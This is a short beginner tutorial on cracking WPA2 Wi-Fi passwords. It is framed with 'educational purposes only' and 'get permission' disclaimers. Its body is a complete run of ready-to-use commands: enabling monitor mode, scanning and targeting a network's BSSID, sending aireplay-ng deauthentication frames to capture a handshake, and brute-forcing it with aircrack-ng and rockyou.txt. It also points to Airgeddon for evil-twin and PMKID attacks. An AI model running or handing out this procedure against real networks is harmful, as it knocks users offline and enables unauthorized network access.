📶 Wi-Fi Hacking Lab: A Beginner’s Guide to WPA2 Hacking
Disclaimer: This guide is for educational purposes only. Use this knowledge to strengthen your network security. Never use these methods on networks you do not own or have explicit permission to test.
🔧 Getting Started with a Hacking OS
- Kali Linux: Download Kali. Flash to USB using Rufus or dd.
- Parrot Security OS: Download Parrot. Lightweight alternative preloaded with tools.
📶 Get the Right Wi-Fi Adapter
- Atheros AR9271: (e.g., Alfa AWUS036NHA)
- Realtek RTL8812AU: (requires driver install)
Driver Installation:
sudo apt update
sudo apt install realtek-rtl88xxau-dkms
Or find drivers on GitHub for specific chipsets.
🎯 Objective: Capture WPA2 Handshake & Crack Password
Step 1: Monitor Mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
Or:
sudo airmon-ng start wlan0
Step 2: Scan Networks
sudo airodump-ng wlan0mon
Step 3: Focus on Target
sudo airodump-ng --bssid <BSSID> -c <CH> -w handshake wlan0mon
Step 4: Deauth Client
sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon
💣 Brute-Forcing with Aircrack-ng
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> handshake.cap
Unzip if needed:
gunzip /usr/share/wordlists/rockyou.txt.gz
⚡ Faster Way: Airgeddon
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
sudo bash airgeddon.sh
Airgeddon automates handshake capture, evil twin attacks, PMKID attacks, and more.
🧠 Pro Tips
- BSSID = Router MAC address
- Start with 2.4GHz before 5GHz
- Monitor mode = Listening; Managed mode = Connecting
- Ctrl+C stops airodump-ng and aireplay-ng
📁 Useful Wordlists
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/fasttrack.txt
- SecLists GitHub Repo
🚨 Final Thoughts
Wi-Fi hacking teaches real-world vulnerabilities, but with great power comes great responsibility.
👨💻 Stay sharp. Stay legal. Always get permission before testing any network.